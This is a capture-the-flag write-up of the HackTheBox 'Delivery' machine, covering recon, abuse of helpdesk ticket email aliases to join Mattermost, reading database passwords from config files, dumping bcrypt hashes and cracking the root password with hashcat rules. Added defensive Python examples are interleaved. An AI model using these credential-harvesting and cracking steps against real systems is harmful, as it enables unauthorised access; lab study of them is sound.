HackTheBox - Delivery write up

Delivery is an easy Linux box.

Recon

As always, let's start with an nmap scan:

$ nmap -A -p- -oN scan.nmap 10.10.10.222
...
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sat, 09 Jan 2021 19:09:12 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: 3uzeey8xwp8z8gdjw68z7cfk4y
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sat, 09 Jan 2021 20:53:40 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 09 Jan 2021 20:53:40 GMT
|_    Content-Length: 0

Three ports are open: 22 for SSH, 80 for an Nginx web server and 8065 for Mattermost. Mattermost is an open-source, self-hostable online chat service.
First of all, let's check port 80.

Web

http://10.10.10.222/index.html
http://10.10.10.222/#contact-us

Our goal is to create an account on Mattermost, but to create an account we need a valid email address. This machine doesn't send email outside of the box, so we can't use a Gmail address, for example.

The HelpDesk app is served on port 80 under a different virtual host.

$ cat /etc/hosts
...
10.10.10.222 helpdesk.delivery.htb delivery.htb
http://helpdesk.delivery.htb/index.php

osTicket is an open-source support ticket system.

First, I try to find a CVE for osTicket, but the version is not displayed on the website. So I look at the JavaScript and CSS source and compare it with the source code available on osTicket's GitHub.

https://github.com/osTicket/osTicket

The most recent change I see is an update from 2 months ago, version 1.15.1. This version does not appear to be vulnerable. :(

So I create an account on the HelpDesk.

We can see that osTicket creates an email address for this ticket, 9244799@delivery.htb. Let's create an account on Mattermost with this email address.

We can see the confirmation email if we check the Ticket Thread.
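The weakness being used here is that the chat server trusts any mailbox in its own domain, including the per-ticket aliases the helpdesk mints for outsiders. Below is an added example (not code from the box, osTicket or Mattermost) of the sign-up check a defender would put in front of self-registration: the domain allow-list, the numeric ticket-alias pattern and the staff directory are all constructed assumptions for this example.

```python
import re

# Constructed policy values. The Mattermost server on the box is an open server
# that accepts any @delivery.htb address, which is what the ticket trick relies on.
ALLOWED_DOMAINS = {"delivery.htb"}
# Hypothetical staff directory: only these mailboxes belong to real people.
STAFF_DIRECTORY = {"maildeliverer@delivery.htb"}
# osTicket mints one address per ticket with a purely numeric local part
# (the write-up's example is 9244799@delivery.htb).
TICKET_ALIAS_RE = re.compile(r"^\d+@")
EMAIL_RE = re.compile(r"^[a-z0-9._%+-]+@([a-z0-9.-]+\.[a-z]{2,})$")


def check_signup_email(address, staff_directory=STAFF_DIRECTORY,
                       allowed_domains=ALLOWED_DOMAINS):
    """Return (allowed, reason) for a self-registration attempt.

    Checks run in the order a defender wants: syntax, domain, ticket-alias
    shape, then the directory, so the reason names the first control that fired.
    Pass staff_directory=None to run only the shape-based controls.
    """
    addr = address.strip().lower()
    m = EMAIL_RE.match(addr)
    if not m:
        return False, "malformed address"
    domain = m.group(1)
    if domain not in allowed_domains:
        return False, "domain not allowed: " + domain
    if TICKET_ALIAS_RE.match(addr):
        return False, "helpdesk ticket alias, not a person"
    if staff_directory is not None and addr not in staff_directory:
        return False, "not in staff directory"
    return True, "ok"


if __name__ == "__main__":
    for a in ("9244799@delivery.htb", "maildeliverer@delivery.htb",
              "someone@gmail.com", "new.hire@delivery.htb"):
        print(a, check_signup_email(a))
```

The directory check is the control that actually closes the hole; the alias pattern is only a cheap early rejection, since a helpdesk could be configured to generate non-numeric aliases.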

Once logged in to Mattermost, we can see a staff conversation.

We have the server credentials, maildeliverer:Youve_G0t_Mail!, and we know that the staff use variations of the password PleaseSubscribe!

With the maildeliverer credentials we can become an admin of osTicket, but that's not interesting. However, these credentials give us SSH access to the box.

$ ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password: Youve_G0t_Mail!
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
...
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ id
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt 
6a1c6cca2f2670e1b56ca4...

Finally, we have our first shell and the user flag!

Root

I found MySQL credentials for osTicket in a PHP config file.

maildeliverer@Delivery:/var/www/osticket/upload/include$ cat ost-config.php 
...                                         
define('ADMIN_EMAIL','maildeliverer@delivery.htb');
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');
...
maildeliverer@Delivery:/var/www/osticket/upload/include$ mysql -u ost_user -p
Enter password: !H3lpD3sk123!
Welcome to the MariaDB monitor.
...
MariaDB [(none)]> use osticket;
MariaDB [osticket]> SELECT username,passwd,isadmin FROM ost_staff;
+---------------+--------------------------------------------------------------+---------+
| username      | passwd                                                       | isadmin |
+---------------+--------------------------------------------------------------+---------+
| maildeliverer | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy |       1 |
+---------------+--------------------------------------------------------------+---------+
1 row in set (0.000 sec)

These credentials are maildeliverer:Youve_G0t_Mail!, so nothing interesting here.

Afterwards, I found other MySQL credentials, this time for Mattermost, in a config.json file.

maildeliverer@Delivery:/opt/mattermost/config$ cat config.json 
...
    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },                                
...  
mmuser:Crack_The_MM_Admin_PW
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password: Crack_The_MM_Admin_PW
Welcome to the MariaDB monitor.
...
MariaDB [(none)]> use mattermost;
Database changed
MariaDB [mattermost]> select username,password from Users;
+----------------------------------+--------------------------------------------------------------+
| username                         | password                                                     |
+----------------------------------+--------------------------------------------------------------+
| ...                              |                                                              |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ...                              |                                                              |
+----------------------------------+--------------------------------------------------------------+
9 rows in set (0.001 sec)
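Both the osTicket ost-config.php and the Mattermost config.json above hand a low-privilege shell the database password in plaintext. As an added example (not part of the write-up, and not code from either project), here is a small audit that parses both config shapes, reports which database user is exposed and whether a plaintext password is present without echoing it, and flags files readable beyond their owner. The sample files and their passwords are constructed placeholders.

```python
import json
import os
import re
import stat
import tempfile
from pathlib import Path

# osTicket stores its database settings as PHP define() calls.
OSTICKET_DEFINE_RE = re.compile(r"define\('(DBHOST|DBNAME|DBUSER|DBPASS)',\s*'([^']*)'\);")
# A Go MySQL DSN starts with user:password@ (the Mattermost SqlSettings.DataSource form).
MYSQL_DSN_RE = re.compile(r"^(?P<user>[^:@/]+):(?P<password>[^@]*)@")


def parse_osticket_config(text):
    """Pull the DB* defines out of an ost-config.php body."""
    return dict(OSTICKET_DEFINE_RE.findall(text))


def parse_mattermost_datasource(text):
    """Split user and password out of SqlSettings.DataSource in config.json."""
    dsn = json.loads(text).get("SqlSettings", {}).get("DataSource", "")
    m = MYSQL_DSN_RE.match(dsn)
    return m.groupdict() if m else None


def permission_findings(path):
    """Report mode bits that let users other than the owner read the file."""
    mode = path.stat().st_mode
    findings = []
    if mode & stat.S_IRGRP:
        findings.append("group-readable")
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    return findings


def audit_config(path):
    """Return what a reviewer needs: the exposed DB user, whether a plaintext
    password is present, and who can read the file. The password itself is
    never returned."""
    text = path.read_text()
    user, has_password = None, False
    if path.suffix == ".php":
        creds = parse_osticket_config(text)
        user, has_password = creds.get("DBUSER"), bool(creds.get("DBPASS"))
    elif path.suffix == ".json":
        parsed = parse_mattermost_datasource(text)
        if parsed:
            user, has_password = parsed["user"], bool(parsed["password"])
    return {
        "file": path.name,
        "db_user": user,
        "plaintext_password": has_password,
        "permissions": permission_findings(path),
    }


# Constructed samples mirroring the two config shapes; passwords are placeholders.
SAMPLE_OSTICKET = """<?php
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','PLACEHOLDER_OSTICKET_DB_PASSWORD');
"""

SAMPLE_MATTERMOST = json.dumps({
    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:PLACEHOLDER_MM_DB_PASSWORD@tcp(127.0.0.1:3306)"
                      "/mattermost?charset=utf8mb4,utf8&readTimeout=30s",
    }
})


def run_demo():
    """Write the samples to a temp dir, one with the weak mode and one with the
    corrected mode, and audit both."""
    with tempfile.TemporaryDirectory() as tmp:
        php = Path(tmp) / "ost-config.php"
        php.write_text(SAMPLE_OSTICKET)
        os.chmod(php, 0o644)  # readable by every local user: the weak setting
        js = Path(tmp) / "config.json"
        js.write_text(SAMPLE_MATTERMOST)
        os.chmod(js, 0o600)   # owner-only: the corrected setting
        return [audit_config(php), audit_config(js)]


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The mode check only covers the file itself; on a real host you would also confirm that the directory chain and the service account the web server runs as do not widen access, and that the DB user is not granted more than its own schema.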

I assume that this hash is a variant of PleaseSubscribe!, so let's use hashcat to crack it. I don't have this tool on my machine, so I installed it on Google Colab; you can find the tutorial here.

$ echo '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > root.hash
$ echo 'PleaseSubscribe!' > wordlists/pleasesub.dict

"""
$ hashcat -h
  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule

$ hashcat -h | grep bcrypt
  3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating System
"""

$ hashcat -a 0 -m 3200 root.hash wordlists/pleasesub.dict -r hashcat/rules/best64.rule
...
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
...

We get the password: PleaseSubscribe!21
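The root password fell because it was the shared base password with a counter appended, exactly the kind of variant a rule file expands. A bcrypt hash cannot be inspected after the fact, so the place to catch this is when the password is set. As an added example (not from the write-up or from Mattermost), the check below normalises a candidate back to its base word and rejects it if that base is on a banned list; the banned list and the leet-substitution table are constructed assumptions.

```python
import re
import unicodedata

# Constructed: base passwords the team is known to share (from the leaked chat on this box).
BANNED_BASES = ["PleaseSubscribe!", "Youve_G0t_Mail!"]

# Common substitutions, undone so that "G0t" and "Got" compare equal.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})
# Digits/punctuation stuck on the front or back: the "21", "2021!", "#99" suffixes.
EDGE_JUNK_RE = re.compile(r"^[^A-Za-z]+|[^A-Za-z]+$")
NON_LETTER_RE = re.compile(r"[^a-z]")


def normalize(password):
    """Reduce a password to the letters of its base word: strip leading and
    trailing non-letters, lowercase, undo leet substitutions, then drop any
    non-letters left in the middle (underscores, dashes)."""
    s = unicodedata.normalize("NFKC", password)
    s = EDGE_JUNK_RE.sub("", s)
    s = s.lower().translate(LEET)
    return NON_LETTER_RE.sub("", s)


def is_variant_of_banned(candidate, bases=BANNED_BASES, min_base_len=8):
    """True when the candidate is a banned base or that base with extra
    characters bolted on. Bases shorter than min_base_len are skipped so that
    short common words do not cause false positives."""
    norm = normalize(candidate)
    for base in bases:
        b = normalize(base)
        if len(b) >= min_base_len and b in norm:
            return True
    return False


if __name__ == "__main__":
    for pw in ("PleaseSubscribe!21", "Y0uve_Got_Mail#99", "correct-horse-battery-staple"):
        print(pw, "rejected" if is_variant_of_banned(pw) else "accepted")
```

This runs in the opposite direction from a cracking rule set: instead of generating every variant of the base, it folds the variant back to the base, so the list of bases stays short and the check stays cheap.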

maildeliverer@Delivery:~$ su root
Password: PleaseSubscribe!21
root@Delivery:/home/maildeliverer# cd
root@Delivery:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Delivery:~# cat root.txt 
53b1fcb07e11b4bde325f...

I hope you enjoyed this write-up!